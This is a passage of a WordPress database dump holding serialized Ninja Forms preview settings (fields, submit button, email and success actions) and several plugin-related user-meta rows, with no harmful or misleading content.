id\";i:2;s:4:\"type\";s:8:\"textarea\";s:10:\"created_at\";s:19:\"2017-09-13 07:17:57\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";i:4;s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:15:\"container_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:12:\"textarea_rte\";s:0:\"\";s:18:\"disable_rte_mobile\";s:0:\"\";s:14:\"textarea_media\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3284\";}}i:8;a:1:{s:8:\"settings\";a:69:{s:5:\"label\";s:6:\"Submit\";s:3:\"key\";s:6:\"submit\";s:9:\"parent_id\";i:2;s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2017-09-13 07:17:57\";s:16:\"processing_label\";s:10:\"Processing\";s:5:\"order\";i:5;s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:44:\"submit_element_hover_styles_background-color\";s:0:\"\";s:34:\"submit_element_hover_styles_border\";s:0:\"\";s:40:\"submit_element_hover_styles_border-style\";s:0:\"\";s:40:\"submit_element_hover_styles_border-color\";s:0:\"\";s:33:\"submit_element_hover_styles_color\";s:0:\"\";s:34:\"submit_element_hover_styles_height\";s:0:\"\";s:33:\"submit_element_hover_styles_width\";s:0:\"\";s:37:\"submit_element_hover_styles_font-size\";s:0:\"\";s:34:\"submit_element_hover_styles_margin\";s:0:\"\";s:35:\"submit_element_hover_styles_padding\";s:0:\"\";s:35:\"submit_element_hover_styles_display\";s:0:\"\";s:33:\"submit_element_hover_styles_float\";s:0:\"\";s:45:\"submit_element_hover_styles_show_advanced_css\";s:1:\"0\";s:36:\"submit_element_hover_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3287\";}}s:5:\"tmp-1\";a:1:{s:8:\"settings\";a:16:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:4:\"type\";s:15:\"listmultiselect\";s:5:\"label\";s:12:\"Multi-Select\";s:3:\"key\";s:29:\"listmultiselect_1505305116113\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";i:1;s:7:\"options\";a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:14:\"Pearlette Club\";s:5:\"value\";s:14:\"pearlette-club\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:14:\"Amicette Club \";s:5:\"value\";s:13:\"amicette-club\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Both\";s:5:\"value\";s:4:\"both\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}}}s:7:\"actions\";a:4:{i:5;a:1:{s:8:\"settings\";a:26:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2017-09-13 07:17:58\";s:5:\"label\";s:16:\"Store Submission\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:18:\"payment_total_type\";s:0:\"\";}}i:8;a:1:{s:8:\"settings\";a:28:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2017-09-13 07:17:58\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:47:\"Thank you {field:name} for filling out my form!\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:89:\"<p>Form submitted successfully.</p><p>A confirmation email was sent to {field:email}.</p>\";s:19:\"email_message_plain\";s:0:\"\";s:18:\"payment_total_type\";s:0:\"\";}}i:6;a:1:{s:8:\"settings\";a:27:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2017-09-13 07:17:58\";s:5:\"label\";s:18:\"Email Confirmation\";s:2:\"to\";s:13:\"{field:email}\";s:7:\"subject\";s:24:\"This is an email action.\";s:7:\"message\";s:19:\"Hello, Ninja Forms!\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:24:\"Submission Confirmation \";s:13:\"email_message\";s:29:\"<p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:18:\"payment_total_type\";s:0:\"\";}}i:7;a:1:{s:8:\"settings\";a:25:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2017-09-13 07:17:58\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"label\";s:18:\"Email Notification\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:20:\"{system:admin_email}\";s:13:\"email_subject\";s:29:\"New message from {field:name}\";s:13:\"email_message\";s:60:\"<p>{field:message}</p><p>-{field:name} ( {field:email} )</p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:1:\"0\";s:19:\"email_message_plain\";s:0:\"\";s:18:\"payment_total_type\";s:0:\"\";}}}}'),(344,1,'icwp_wpsf_login_intent','0'),(345,1,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(348,6,'wp_statistics','a:1:{s:13:\"dashboard_set\";s:6:\"12.1.3\";}'),(349,6,'metaboxhidden_dashboard','a:11:{i:0;s:29:\"wp-statistics-browsers-widget\";i:1;s:30:\"wp-statistics-countries-widget\";i:2;s:28:\"wp-statistics-hitsmap-widget\";i:3;s:25:\"wp-statistics-hits-widget\";i:4;s:26:\"wp-statistics-pages-widget\";i:5;s:27:\"wp-statistics-recent-widget\";i:6;s:30:\"wp-statistics-referring-widget\";i:7;s:27:\"wp-statistics-search-widget\";i:8;s:28:\"wp-statistics-summary-widget\";i:9;s:26:\"wp-statistics-words-widget\";i:10;s:33:\"wp-statistics-top-visitors-widget\";}'),(350,6,'gform_recent_forms','a:5:{i:0;s:2:\"10\";i:1;s:1:\"6\";i:2;s:1:\"9\";i:3;s:1:\"8\";i:4;s:1:\"7\";}'),(351,6,'icwp-flag-can-store-user-meta','icwp'),(352,6,'lwz_dashboard_quick_press_last_post_id','1450'),(353,6,'itsec_user_activity_last_seen','1613258318'),(365,1,'lwz_nf_form_preview_tmp-1520942160','a:4:{s:2:\"id\";s:14:\"tmp-1520942160\";s:8:\"settings\";a:18:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:10:\"show_title\";i:1;s:14:\"clear_complete\";i:1;s:13:\"hide_complete\";i:1;s:17:\"default_label_pos\";s:5:\"above\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";i:1;s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:9:\"logged_in\";b:0;s:17:\"not_logged_in_msg\";s:0:\"\";s:13:\"sub_limit_msg\";s:42:\"The form has reached its submission limit.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:2:{i:0;s:24:\"listselect_1520942232089\";i:1;s:24:\"listselect_1520942232890\";}}s:6:\"fields\";a:2:{s:5:\"tmp-1\";a:1:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:6:\"Select\";s:3:\"key\";s:24:\"listselect_1520942232089\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";b:0;s:7:\"options\";a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";}}s:5:\"tmp-2\";a:1:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:6:\"Select\";s:3:\"key\";s:24:\"listselect_1520942232890\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";b:0;s:7:\"options\";a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 